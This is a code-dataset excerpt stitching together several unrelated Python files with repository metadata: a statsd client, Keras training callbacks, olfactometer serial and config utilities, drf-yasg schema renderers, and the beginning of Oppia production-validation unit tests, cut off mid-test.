self._sock.sendto(data.encode('ascii'), self._addr)
except (socket.error, RuntimeError):
# No time for love, Dr. Jones!
pass
def pipeline(self):
return Pipeline(self)
| 30.019608
| 66
| 0.594383
|
from __future__ import absolute_import, division, unicode_literals
import socket
from .base import StatsClientBase, PipelineBase
class Pipeline(PipelineBase):
def __init__(self, client):
super(Pipeline, self).__init__(client)
self._maxudpsize = client._maxudpsize
def _send(self):
data = self._stats.popleft()
while self._stats:
stat = self._stats.popleft()
if len(stat) + len(data) + 1 >= self._maxudpsize:
self._client._after(data)
data = stat
else:
data += '\n' + stat
self._client._after(data)
class StatsClient(StatsClientBase):
def __init__(self, host='localhost', port=8125, prefix=None,
maxudpsize=512, ipv6=False):
fam = socket.AF_INET6 if ipv6 else socket.AF_INET
family, _, _, _, addr = socket.getaddrinfo(
host, port, fam, socket.SOCK_DGRAM)[0]
self._addr = addr
self._sock = socket.socket(family, socket.SOCK_DGRAM)
self._prefix = prefix
self._maxudpsize = maxudpsize
def _send(self, data):
try:
self._sock.sendto(data.encode('ascii'), self._addr)
except (socket.error, RuntimeError):
pass
def pipeline(self):
return Pipeline(self)
| true
| true
|
790c5f4af793f98a8a8efe7949d616b14f82edda
| 2,828
|
py
|
Python
|
src/predictionAlgorithms/machineLearning/helpers/callbacks.py
|
aivaras-ciurlionis/meteo
|
434759d16f7cca505d280475611d1fef5176827b
|
[
"MIT"
] | null | null | null |
src/predictionAlgorithms/machineLearning/helpers/callbacks.py
|
aivaras-ciurlionis/meteo
|
434759d16f7cca505d280475611d1fef5176827b
|
[
"MIT"
] | 6
|
2020-05-23T11:30:48.000Z
|
2022-03-11T23:45:06.000Z
|
src/predictionAlgorithms/machineLearning/helpers/callbacks.py
|
aivaras-ciurlionis/meteo
|
434759d16f7cca505d280475611d1fef5176827b
|
[
"MIT"
] | null | null | null |
import keras
from sklearn.metrics import roc_auc_score
from src.predictionAlgorithms.machineLearning.helpers.validation import Validation
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import os
import glob
class Callbacks(keras.callbacks.Callback):
validationSequences = []
algorithm = None
number = 1
validation_frequency = 1
size = 64
step = 1
base = 4
def set_step(self, step):
self.step = step
return self
def set_base(self, base):
self.base = base
return base
def set_size(self, size):
self.size = size
return self
def set_validation_frequency(self, frequency):
self.validation_frequency = frequency
return self
def set_validation_data(self, validation_data):
self.validationSequences = validation_data
return self
def set_algorithm(self, algorithm):
self.algorithm = algorithm
return self
def on_train_begin(self, logs={}):
# Initialize the lists for holding the logs, losses and accuracies
self.losses = []
self.acc = []
self.val_losses = []
self.val_acc = []
self.logs = []
epoch_graphs = glob.glob('../output/*')
for f in epoch_graphs:
os.remove(f)
def on_train_end(self, logs={}):
return
def on_epoch_begin(self, epoch, logs={}):
return
def on_epoch_end(self, epoch, logs={}):
if self.number % self.validation_frequency != 0:
self.number += 1
return
validation = Validation()
validation.set_validation_data(self.validationSequences)\
.set_dimensions(self.size)\
.set_base(self.base)\
.set_step(self.step)\
.validate(self.algorithm)
self.number += 1
self.logs.append(logs)
self.losses.append(logs.get('loss'))
self.acc.append(logs.get('acc'))
self.val_losses.append(logs.get('val_loss'))
self.val_acc.append(logs.get('val_acc'))
if len(self.losses) > 1:
N = np.arange(0, len(self.losses))
plt.figure()
plt.plot(N, self.losses, label="train_loss")
plt.plot(N, self.acc, label="train_acc")
plt.plot(N, self.val_losses, label="val_loss")
plt.plot(N, self.val_acc, label="val_acc")
plt.title("Training Loss and Accuracy [Epoch {}]".format(epoch))
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
plt.savefig('../output/Epoch-{}.png'.format(epoch))
plt.close()
return
def on_batch_begin(self, batch, logs={}):
return
def on_batch_end(self, batch, logs={}):
return
| 28
| 82
| 0.597595
|
import keras
from sklearn.metrics import roc_auc_score
from src.predictionAlgorithms.machineLearning.helpers.validation import Validation
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import os
import glob
class Callbacks(keras.callbacks.Callback):
validationSequences = []
algorithm = None
number = 1
validation_frequency = 1
size = 64
step = 1
base = 4
def set_step(self, step):
self.step = step
return self
def set_base(self, base):
self.base = base
return base
def set_size(self, size):
self.size = size
return self
def set_validation_frequency(self, frequency):
self.validation_frequency = frequency
return self
def set_validation_data(self, validation_data):
self.validationSequences = validation_data
return self
def set_algorithm(self, algorithm):
self.algorithm = algorithm
return self
def on_train_begin(self, logs={}):
self.losses = []
self.acc = []
self.val_losses = []
self.val_acc = []
self.logs = []
epoch_graphs = glob.glob('../output/*')
for f in epoch_graphs:
os.remove(f)
def on_train_end(self, logs={}):
return
def on_epoch_begin(self, epoch, logs={}):
return
def on_epoch_end(self, epoch, logs={}):
if self.number % self.validation_frequency != 0:
self.number += 1
return
validation = Validation()
validation.set_validation_data(self.validationSequences)\
.set_dimensions(self.size)\
.set_base(self.base)\
.set_step(self.step)\
.validate(self.algorithm)
self.number += 1
self.logs.append(logs)
self.losses.append(logs.get('loss'))
self.acc.append(logs.get('acc'))
self.val_losses.append(logs.get('val_loss'))
self.val_acc.append(logs.get('val_acc'))
if len(self.losses) > 1:
N = np.arange(0, len(self.losses))
plt.figure()
plt.plot(N, self.losses, label="train_loss")
plt.plot(N, self.acc, label="train_acc")
plt.plot(N, self.val_losses, label="val_loss")
plt.plot(N, self.val_acc, label="val_acc")
plt.title("Training Loss and Accuracy [Epoch {}]".format(epoch))
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
plt.savefig('../output/Epoch-{}.png'.format(epoch))
plt.close()
return
def on_batch_begin(self, batch, logs={}):
return
def on_batch_end(self, batch, logs={}):
return
| true
| true
|
790c5f9070d838cdcf8fa8c3eb3daa1d9f51e605
| 3,766
|
py
|
Python
|
olfactometry/utils.py
|
olfa-lab/PyBpodGUI
|
73895e493d982fd1d3abb5c8b521de116ef87c79
|
[
"MIT"
] | null | null | null |
olfactometry/utils.py
|
olfa-lab/PyBpodGUI
|
73895e493d982fd1d3abb5c8b521de116ef87c79
|
[
"MIT"
] | null | null | null |
olfactometry/utils.py
|
olfa-lab/PyBpodGUI
|
73895e493d982fd1d3abb5c8b521de116ef87c79
|
[
"MIT"
] | 1
|
2021-12-03T16:18:57.000Z
|
2021-12-03T16:18:57.000Z
|
import os
import json
import logging
import serial
from serial.tools import list_ports
import time
CONFIG_FILENAME_DEFAULT = 'olfa_config.json'
def get_olfa_config(config_filename=''):
"""
Find and parse olfactometer configuration JSON.
:param config_filename: string with path to configuration.
:return: returns a tuple with (config_fn, config_dict)
:rtype: tuple
"""
if not config_filename:
logging.info("No olfa config file specified, looking for default in OLFA_CONFIG os variable")
config_filename = os.environ.get("OLFA_CONFIG")
#if it didnt find it there, it tries the legacy default
if not config_filename:
config_filename = CONFIG_FILENAME_DEFAULT
logging.info("No OLFA_CONFIG os variable, trying with legacy default " + CONFIG_FILENAME_DEFAULT)
if os.path.exists(config_filename):
with open(config_filename) as f:
config = json.load(f)
else:
raise Exception('No olfactometer configuration file found at {0}'.format(config_filename))
return config_filename, config
def flatten_dictionary(dictionary, separator=':', flattened_dict=None, parent_string=''):
"""
Flattens nested dictionary into a single dictionary:
{'hello': {'world': 1,
'moon': 2}}
becomes:
{'hello:world': 1,
'hello:moon': 2}
Uses recursion to flatten as many layers as exist in your dictionary.
:param dictionary: nested dictionary you wish to flatten.
:param flattened_dict: (used for recursion) current flattened dictionary to add to
:param parent_string: (used for recursion) current key string to use as prefix for
:return: flattened dictionary
:type dictionary: dict
:type flattened_dict: dict
:type parent_string: str
:rtype: dict
"""
if flattened_dict is None: # dicts are mutable, so we shouldn't use a dict as the default argument!!!
flattened_dict = {} # instead, redeclare an empty dictionary here.
for k, v in dictionary.items():
if parent_string:
full_key = "{0}{1}{2}".format(parent_string, separator, k)
else:
full_key = k
if isinstance(v, dict): # use recursion to flatten and add nested dictionaries to the product.
_ = flatten_dictionary(v, flattened_dict=flattened_dict, parent_string=full_key)
else:
flattened_dict[full_key] = v
return flattened_dict
def connect_serial(port, baudrate=115200, timeout=1, writeTimeout=1):
"""
Return Serial object after making sure that the port is accessible and that the port is expressed as a string.
:param port: str or int (ie "COM4" or 4 for Windows).
:param baudrate: baudrate.
:param timeout: read timeout in seconds, default 1 sec.
:param writeTimeout: write timeout in seconds, default 1 sec.
:return: serial port object.
:rtype: serial.Serial
"""
if isinstance(port, int):
port = "COM{0}".format(port)
names_list = list()
for i in list_ports.comports():
names_list.append(i[0])
if port not in names_list:
print(("Serial not found on {0}.".format(port)))
print('Listing current serial ports with devices:')
for ser in list_ports.comports():
ser_str = '\t{0}: {1}'.format(ser[0], ser[1])
print(ser_str)
time.sleep(.01) # just to let the above lines print before the exemption is raised. cleans console output.
raise serial.SerialException('Requested COM port: {0} is not listed as connected.'.format(port))
else:
return serial.Serial(port, baudrate=baudrate, timeout=timeout, writeTimeout=writeTimeout)
class OlfaException(Exception):
pass
| 36.921569
| 115
| 0.674456
|
import os
import json
import logging
import serial
from serial.tools import list_ports
import time
CONFIG_FILENAME_DEFAULT = 'olfa_config.json'
def get_olfa_config(config_filename=''):
if not config_filename:
logging.info("No olfa config file specified, looking for default in OLFA_CONFIG os variable")
config_filename = os.environ.get("OLFA_CONFIG")
if not config_filename:
config_filename = CONFIG_FILENAME_DEFAULT
logging.info("No OLFA_CONFIG os variable, trying with legacy default " + CONFIG_FILENAME_DEFAULT)
if os.path.exists(config_filename):
with open(config_filename) as f:
config = json.load(f)
else:
raise Exception('No olfactometer configuration file found at {0}'.format(config_filename))
return config_filename, config
def flatten_dictionary(dictionary, separator=':', flattened_dict=None, parent_string=''):
if flattened_dict is None:
flattened_dict = {} # instead, redeclare an empty dictionary here.
for k, v in dictionary.items():
if parent_string:
full_key = "{0}{1}{2}".format(parent_string, separator, k)
else:
full_key = k
if isinstance(v, dict): # use recursion to flatten and add nested dictionaries to the product.
_ = flatten_dictionary(v, flattened_dict=flattened_dict, parent_string=full_key)
else:
flattened_dict[full_key] = v
return flattened_dict
def connect_serial(port, baudrate=115200, timeout=1, writeTimeout=1):
if isinstance(port, int):
port = "COM{0}".format(port)
names_list = list()
for i in list_ports.comports():
names_list.append(i[0])
if port not in names_list:
print(("Serial not found on {0}.".format(port)))
print('Listing current serial ports with devices:')
for ser in list_ports.comports():
ser_str = '\t{0}: {1}'.format(ser[0], ser[1])
print(ser_str)
time.sleep(.01) # just to let the above lines print before the exemption is raised. cleans console output.
raise serial.SerialException('Requested COM port: {0} is not listed as connected.'.format(port))
else:
return serial.Serial(port, baudrate=baudrate, timeout=timeout, writeTimeout=writeTimeout)
class OlfaException(Exception):
pass
| true
| true
|
790c5fcb996d72b9571af6b7d6b1843518659273
| 7,274
|
py
|
Python
|
src/drf_yasg/renderers.py
|
yihuang/drf-yasg
|
e860ce315f85b93731b5d7a7dfcc91149d2a1948
|
[
"BSD-3-Clause"
] | null | null | null |
src/drf_yasg/renderers.py
|
yihuang/drf-yasg
|
e860ce315f85b93731b5d7a7dfcc91149d2a1948
|
[
"BSD-3-Clause"
] | null | null | null |
src/drf_yasg/renderers.py
|
yihuang/drf-yasg
|
e860ce315f85b93731b5d7a7dfcc91149d2a1948
|
[
"BSD-3-Clause"
] | null | null | null |
import six
from django.shortcuts import render, resolve_url
from django.utils.functional import Promise
from rest_framework.renderers import BaseRenderer, JSONRenderer, TemplateHTMLRenderer
from rest_framework.utils import json
from .app_settings import redoc_settings, swagger_settings
from .codecs import VALIDATORS, OpenAPICodecJson, OpenAPICodecYaml
from .openapi import Swagger
from .utils import filter_none
class _SpecRenderer(BaseRenderer):
"""Base class for text renderers. Handles encoding and validation."""
charset = 'utf-8'
validators = []
codec_class = None
@classmethod
def with_validators(cls, validators):
assert all(vld in VALIDATORS for vld in validators), "allowed validators are " + ", ".join(VALIDATORS)
return type(cls.__name__, (cls,), {'validators': validators})
def render(self, data, media_type=None, renderer_context=None):
assert self.codec_class, "must override codec_class"
codec = self.codec_class(self.validators)
if not isinstance(data, Swagger): # pragma: no cover
# if `swagger` is not a ``Swagger`` object, it means we somehow got a non-success ``Response``
# in that case, it's probably better to let the default ``JSONRenderer`` render it
# see https://github.com/axnsan12/drf-yasg/issues/58
return JSONRenderer().render(data, media_type, renderer_context)
return codec.encode(data)
class OpenAPIRenderer(_SpecRenderer):
"""Renders the schema as a JSON document with the ``application/openapi+json`` specific mime type."""
media_type = 'application/openapi+json'
format = 'openapi'
codec_class = OpenAPICodecJson
class SwaggerJSONRenderer(_SpecRenderer):
"""Renders the schema as a JSON document with the generic ``application/json`` mime type."""
media_type = 'application/json'
format = '.json'
codec_class = OpenAPICodecJson
class SwaggerYAMLRenderer(_SpecRenderer):
"""Renders the schema as a YAML document."""
media_type = 'application/yaml'
format = '.yaml'
codec_class = OpenAPICodecYaml
class _UIRenderer(BaseRenderer):
"""Base class for web UI renderers. Handles loading and passing settings to the appropriate template."""
media_type = 'text/html'
charset = 'utf-8'
template = ''
def render(self, swagger, accepted_media_type=None, renderer_context=None):
if not isinstance(swagger, Swagger): # pragma: no cover
# if `swagger` is not a ``Swagger`` object, it means we somehow got a non-success ``Response``
# in that case, it's probably better to let the default ``TemplateHTMLRenderer`` render it
# see https://github.com/axnsan12/drf-yasg/issues/58
return TemplateHTMLRenderer().render(swagger, accepted_media_type, renderer_context)
self.set_context(renderer_context, swagger)
return render(renderer_context['request'], self.template, renderer_context)
def set_context(self, renderer_context, swagger=None):
renderer_context['title'] = swagger.info.title or '' if swagger else ''
renderer_context['version'] = swagger.info.version or '' if swagger else ''
renderer_context['oauth2_config'] = json.dumps(self.get_oauth2_config())
renderer_context['USE_SESSION_AUTH'] = swagger_settings.USE_SESSION_AUTH
renderer_context.update(self.get_auth_urls())
def resolve_url(self, to):
if isinstance(to, Promise):
to = str(to)
if to is None:
return None
args, kwargs = None, None
if not isinstance(to, six.string_types):
if len(to) > 2:
to, args, kwargs = to
elif len(to) == 2:
to, kwargs = to
args = args or ()
kwargs = kwargs or {}
return resolve_url(to, *args, **kwargs)
def get_auth_urls(self):
urls = {
'LOGIN_URL': self.resolve_url(swagger_settings.LOGIN_URL),
'LOGOUT_URL': self.resolve_url(swagger_settings.LOGOUT_URL),
}
return filter_none(urls)
def get_oauth2_config(self):
data = swagger_settings.OAUTH2_CONFIG
assert isinstance(data, dict), "OAUTH2_CONFIG must be a dict"
return data
class SwaggerUIRenderer(_UIRenderer):
"""Renders a swagger-ui web interface for schema browisng."""
template = 'drf-yasg/swagger-ui.html'
format = 'swagger'
def set_context(self, renderer_context, swagger=None):
super(SwaggerUIRenderer, self).set_context(renderer_context, swagger)
renderer_context['swagger_settings'] = json.dumps(self.get_swagger_ui_settings())
def get_swagger_ui_settings(self):
data = {
'url': self.resolve_url(swagger_settings.SPEC_URL),
'operationsSorter': swagger_settings.OPERATIONS_SORTER,
'tagsSorter': swagger_settings.TAGS_SORTER,
'docExpansion': swagger_settings.DOC_EXPANSION,
'deepLinking': swagger_settings.DEEP_LINKING,
'showExtensions': swagger_settings.SHOW_EXTENSIONS,
'defaultModelRendering': swagger_settings.DEFAULT_MODEL_RENDERING,
'defaultModelExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
'defaultModelsExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
'showCommonExtensions': swagger_settings.SHOW_COMMON_EXTENSIONS,
'oauth2RedirectUrl': swagger_settings.OAUTH2_REDIRECT_URL,
'supportedSubmitMethods': swagger_settings.SUPPORTED_SUBMIT_METHODS,
'displayOperationId': swagger_settings.DISPLAY_OPERATION_ID,
'persistAuth': swagger_settings.PERSIST_AUTH,
'refetchWithAuth': swagger_settings.REFETCH_SCHEMA_WITH_AUTH,
'refetchOnLogout': swagger_settings.REFETCH_SCHEMA_ON_LOGOUT,
'fetchSchemaWithQuery': swagger_settings.FETCH_SCHEMA_WITH_QUERY,
}
data = filter_none(data)
if swagger_settings.VALIDATOR_URL != '':
data['validatorUrl'] = self.resolve_url(swagger_settings.VALIDATOR_URL)
return data
class ReDocRenderer(_UIRenderer):
"""Renders a ReDoc web interface for schema browisng."""
template = 'drf-yasg/redoc.html'
format = 'redoc'
def set_context(self, renderer_context, swagger=None):
super(ReDocRenderer, self).set_context(renderer_context, swagger)
renderer_context['redoc_settings'] = json.dumps(self.get_redoc_settings())
def get_redoc_settings(self):
data = {
'url': self.resolve_url(redoc_settings.SPEC_URL),
'lazyRendering': redoc_settings.LAZY_RENDERING,
'hideHostname': redoc_settings.HIDE_HOSTNAME,
'expandResponses': redoc_settings.EXPAND_RESPONSES,
'pathInMiddlePanel': redoc_settings.PATH_IN_MIDDLE,
'nativeScrollbars': redoc_settings.NATIVE_SCROLLBARS,
'requiredPropsFirst': redoc_settings.REQUIRED_PROPS_FIRST,
'fetchSchemaWithQuery': redoc_settings.FETCH_SCHEMA_WITH_QUERY,
}
return filter_none(data)
class ReDocOldRenderer(ReDocRenderer):
"""Renders a ReDoc 1.x.x web interface for schema browisng."""
template = 'drf-yasg/redoc-old.html'
| 41.096045
| 110
| 0.690267
|
import six
from django.shortcuts import render, resolve_url
from django.utils.functional import Promise
from rest_framework.renderers import BaseRenderer, JSONRenderer, TemplateHTMLRenderer
from rest_framework.utils import json
from .app_settings import redoc_settings, swagger_settings
from .codecs import VALIDATORS, OpenAPICodecJson, OpenAPICodecYaml
from .openapi import Swagger
from .utils import filter_none
class _SpecRenderer(BaseRenderer):
charset = 'utf-8'
validators = []
codec_class = None
@classmethod
def with_validators(cls, validators):
assert all(vld in VALIDATORS for vld in validators), "allowed validators are " + ", ".join(VALIDATORS)
return type(cls.__name__, (cls,), {'validators': validators})
def render(self, data, media_type=None, renderer_context=None):
assert self.codec_class, "must override codec_class"
codec = self.codec_class(self.validators)
if not isinstance(data, Swagger):
# see https://github.com/axnsan12/drf-yasg/issues/58
return JSONRenderer().render(data, media_type, renderer_context)
return codec.encode(data)
class OpenAPIRenderer(_SpecRenderer):
media_type = 'application/openapi+json'
format = 'openapi'
codec_class = OpenAPICodecJson
class SwaggerJSONRenderer(_SpecRenderer):
media_type = 'application/json'
format = '.json'
codec_class = OpenAPICodecJson
class SwaggerYAMLRenderer(_SpecRenderer):
media_type = 'application/yaml'
format = '.yaml'
codec_class = OpenAPICodecYaml
class _UIRenderer(BaseRenderer):
media_type = 'text/html'
charset = 'utf-8'
template = ''
def render(self, swagger, accepted_media_type=None, renderer_context=None):
if not isinstance(swagger, Swagger): # pragma: no cover
# if `swagger` is not a ``Swagger`` object, it means we somehow got a non-success ``Response``
# in that case, it's probably better to let the default ``TemplateHTMLRenderer`` render it
return TemplateHTMLRenderer().render(swagger, accepted_media_type, renderer_context)
self.set_context(renderer_context, swagger)
return render(renderer_context['request'], self.template, renderer_context)
def set_context(self, renderer_context, swagger=None):
renderer_context['title'] = swagger.info.title or '' if swagger else ''
renderer_context['version'] = swagger.info.version or '' if swagger else ''
renderer_context['oauth2_config'] = json.dumps(self.get_oauth2_config())
renderer_context['USE_SESSION_AUTH'] = swagger_settings.USE_SESSION_AUTH
renderer_context.update(self.get_auth_urls())
def resolve_url(self, to):
if isinstance(to, Promise):
to = str(to)
if to is None:
return None
args, kwargs = None, None
if not isinstance(to, six.string_types):
if len(to) > 2:
to, args, kwargs = to
elif len(to) == 2:
to, kwargs = to
args = args or ()
kwargs = kwargs or {}
return resolve_url(to, *args, **kwargs)
def get_auth_urls(self):
urls = {
'LOGIN_URL': self.resolve_url(swagger_settings.LOGIN_URL),
'LOGOUT_URL': self.resolve_url(swagger_settings.LOGOUT_URL),
}
return filter_none(urls)
def get_oauth2_config(self):
data = swagger_settings.OAUTH2_CONFIG
assert isinstance(data, dict), "OAUTH2_CONFIG must be a dict"
return data
class SwaggerUIRenderer(_UIRenderer):
template = 'drf-yasg/swagger-ui.html'
format = 'swagger'
def set_context(self, renderer_context, swagger=None):
super(SwaggerUIRenderer, self).set_context(renderer_context, swagger)
renderer_context['swagger_settings'] = json.dumps(self.get_swagger_ui_settings())
def get_swagger_ui_settings(self):
data = {
'url': self.resolve_url(swagger_settings.SPEC_URL),
'operationsSorter': swagger_settings.OPERATIONS_SORTER,
'tagsSorter': swagger_settings.TAGS_SORTER,
'docExpansion': swagger_settings.DOC_EXPANSION,
'deepLinking': swagger_settings.DEEP_LINKING,
'showExtensions': swagger_settings.SHOW_EXTENSIONS,
'defaultModelRendering': swagger_settings.DEFAULT_MODEL_RENDERING,
'defaultModelExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
'defaultModelsExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
'showCommonExtensions': swagger_settings.SHOW_COMMON_EXTENSIONS,
'oauth2RedirectUrl': swagger_settings.OAUTH2_REDIRECT_URL,
'supportedSubmitMethods': swagger_settings.SUPPORTED_SUBMIT_METHODS,
'displayOperationId': swagger_settings.DISPLAY_OPERATION_ID,
'persistAuth': swagger_settings.PERSIST_AUTH,
'refetchWithAuth': swagger_settings.REFETCH_SCHEMA_WITH_AUTH,
'refetchOnLogout': swagger_settings.REFETCH_SCHEMA_ON_LOGOUT,
'fetchSchemaWithQuery': swagger_settings.FETCH_SCHEMA_WITH_QUERY,
}
data = filter_none(data)
if swagger_settings.VALIDATOR_URL != '':
data['validatorUrl'] = self.resolve_url(swagger_settings.VALIDATOR_URL)
return data
class ReDocRenderer(_UIRenderer):
template = 'drf-yasg/redoc.html'
format = 'redoc'
def set_context(self, renderer_context, swagger=None):
super(ReDocRenderer, self).set_context(renderer_context, swagger)
renderer_context['redoc_settings'] = json.dumps(self.get_redoc_settings())
def get_redoc_settings(self):
data = {
'url': self.resolve_url(redoc_settings.SPEC_URL),
'lazyRendering': redoc_settings.LAZY_RENDERING,
'hideHostname': redoc_settings.HIDE_HOSTNAME,
'expandResponses': redoc_settings.EXPAND_RESPONSES,
'pathInMiddlePanel': redoc_settings.PATH_IN_MIDDLE,
'nativeScrollbars': redoc_settings.NATIVE_SCROLLBARS,
'requiredPropsFirst': redoc_settings.REQUIRED_PROPS_FIRST,
'fetchSchemaWithQuery': redoc_settings.FETCH_SCHEMA_WITH_QUERY,
}
return filter_none(data)
class ReDocOldRenderer(ReDocRenderer):
template = 'drf-yasg/redoc-old.html'
| true
| true
|
790c61d66ec9360ba20d79b6857506daf66299c9
| 287,940
|
py
|
Python
|
core/domain/prod_validation_jobs_one_off_test.py
|
cclauss/oppia
|
7ad9d06e434c589f0aaa015252ca65872557b7eb
|
[
"Apache-2.0"
] | null | null | null |
core/domain/prod_validation_jobs_one_off_test.py
|
cclauss/oppia
|
7ad9d06e434c589f0aaa015252ca65872557b7eb
|
[
"Apache-2.0"
] | null | null | null |
core/domain/prod_validation_jobs_one_off_test.py
|
cclauss/oppia
|
7ad9d06e434c589f0aaa015252ca65872557b7eb
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for core.domain.prod_validation_jobs_one_off."""
import ast
import datetime
import math
import random
import time
import types
from constants import constants
from core import jobs_registry
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import prod_validation_jobs_one_off
from core.domain import rating_services
from core.domain import recommendations_services
from core.domain import rights_manager
from core.domain import story_domain
from core.domain import story_services
from core.domain import subscription_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.platform.taskqueue import gae_taskqueue_services as taskqueue_services
from core.tests import test_utils
import feconf
from google.appengine.api import datastore_types
from google.appengine.ext import db
gae_search_services = models.Registry.import_search_services()
USER_EMAIL = 'useremail@example.com'
USER_NAME = 'username'
CURRENT_DATETIME = datetime.datetime.utcnow()
(
activity_models, audit_models, base_models,
collection_models, config_models, email_models,
exp_models, feedback_models, file_models,
recommendations_models, story_models,
user_models,) = (
models.Registry.import_models([
models.NAMES.activity, models.NAMES.audit, models.NAMES.base_model,
models.NAMES.collection, models.NAMES.config, models.NAMES.email,
models.NAMES.exploration, models.NAMES.feedback, models.NAMES.file,
models.NAMES.recommendations, models.NAMES.story,
models.NAMES.user]))
OriginalDatetimeType = datetime.datetime
class PatchedDatetimeType(type):
"""Validates the datetime instances."""
def __instancecheck__(cls, other):
"""Validates whether the given instance is a datatime
instance.
"""
return isinstance(other, OriginalDatetimeType)
class MockDatetime13Hours(datetime.datetime):
__metaclass__ = PatchedDatetimeType
@classmethod
def utcnow(cls):
"""Returns the current date and time 13 hours behind UTC."""
return CURRENT_DATETIME - datetime.timedelta(hours=13)
def run_job_and_check_output(
self, expected_output, sort=False, literal_eval=False):
"""Helper function to run job and compare output."""
job_id = self.job_class.create_new()
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 0)
self.job_class.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_tasks()
actual_output = self.job_class.get_output(job_id)
if literal_eval:
actual_output_dict = {}
expected_output_dict = {}
for item in [ast.literal_eval(value) for value in actual_output]:
value = item[1]
if isinstance(value, list):
value = sorted(value)
actual_output_dict[item[0]] = value
for item in [ast.literal_eval(value) for value in expected_output]:
value = item[1]
if isinstance(value, list):
value = sorted(value)
expected_output_dict[item[0]] = value
self.assertEqual(
sorted(actual_output_dict.keys()),
sorted(expected_output_dict.keys()))
for key in actual_output_dict:
self.assertEqual(actual_output_dict[key], expected_output_dict[key])
elif sort:
self.assertEqual(sorted(actual_output), sorted(expected_output))
else:
self.assertEqual(actual_output, expected_output)
def update_datastore_types_for_mock_datetime():
"""Updates datastore types for MockDatetime13Hours to ensure that validation
of ndb datetime properties does not fail.
"""
# pylint: disable=protected-access
datastore_types._VALIDATE_PROPERTY_VALUES[MockDatetime13Hours] = (
datastore_types.ValidatePropertyNothing)
datastore_types._PACK_PROPERTY_VALUES[MockDatetime13Hours] = (
datastore_types.PackDatetime)
datastore_types._PROPERTY_MEANINGS[MockDatetime13Hours] = (
datastore_types.entity_pb.Property.GD_WHEN)
# pylint: enable=protected-access
class MockModel(base_models.BaseModel):
pass
class MockSnapshotModel(base_models.BaseModel):
commit_type = 'edit'
commit_cmds = []
class MockBaseModelValidator(prod_validation_jobs_one_off.BaseModelValidator):
pass
class MockSummaryModelValidator(
prod_validation_jobs_one_off.BaseSummaryModelValidator):
@classmethod
def _get_external_id_relationships(cls, item):
return {}
class MockSnapshotContentModelValidator(
prod_validation_jobs_one_off.BaseSnapshotContentModelValidator):
@classmethod
def _get_external_id_relationships(cls, item):
return {}
class MockSnapshotMetadataModelValidator(
prod_validation_jobs_one_off.BaseSnapshotMetadataModelValidator):
EXTERNAL_MODEL_NAME = 'external model'
@classmethod
def _get_external_id_relationships(cls, item):
return {
'external_model_ids': (MockModel, [])
}
class NotImplementedErrorTests(test_utils.GenericTestBase):
def setUp(self):
super(NotImplementedErrorTests, self).setUp()
self.item = MockModel(id='mockmodel')
self.item.put()
def test_error_is_raised_if_fetch_external_properties_is_undefined(self):
with self.assertRaises(NotImplementedError):
MockBaseModelValidator().validate(self.item)
def test_error_is_get_external_model_properties_is_undefined(self):
with self.assertRaises(NotImplementedError):
MockSummaryModelValidator().validate(self.item)
def test_error_is_raised_if_external_model_name_is_undefined(self):
with self.assertRaisesRegexp(
Exception, 'External model name should be specified'):
MockSnapshotContentModelValidator().validate(self.item)
def test_error_is_raised_if_get_change_domain_class_is_undefined(self):
with self.assertRaises(NotImplementedError):
snapshot_model = MockSnapshotModel(id='mockmodel')
snapshot_model.put()
MockSnapshotMetadataModelValidator().validate(snapshot_model)
def test_error_is_raised_if_entity_classes_to_map_over_is_undefined(self):
job_class = prod_validation_jobs_one_off.ProdValidationAuditOneOffJob
with self.assertRaises(NotImplementedError), self.swap(
jobs_registry, 'ONE_OFF_JOB_MANAGERS', [job_class]):
job_id = job_class.create_new()
job_class.enqueue(job_id)
self.process_and_flush_pending_tasks()
class ActivityReferencesModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ActivityReferencesModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
exploration = exp_domain.Exploration.create_default_exploration(
'1exp', title='title', category='category')
exp_services.save_new_exploration(self.owner_id, exploration)
collection = collection_domain.Collection.create_default_collection(
'1col', title='title', category='category')
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance = (
activity_models.ActivityReferencesModel.get_or_create('featured'))
self.model_instance.activity_references = [{
'type': constants.ACTIVITY_TYPE_EXPLORATION,
'id': '1exp',
}, {
'type': constants.ACTIVITY_TYPE_COLLECTION,
'id': '1col',
}]
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.ActivityReferencesModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated ActivityReferencesModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ActivityReferencesModel\', '
'[u\'Entity id featured: The created_on field has a value '
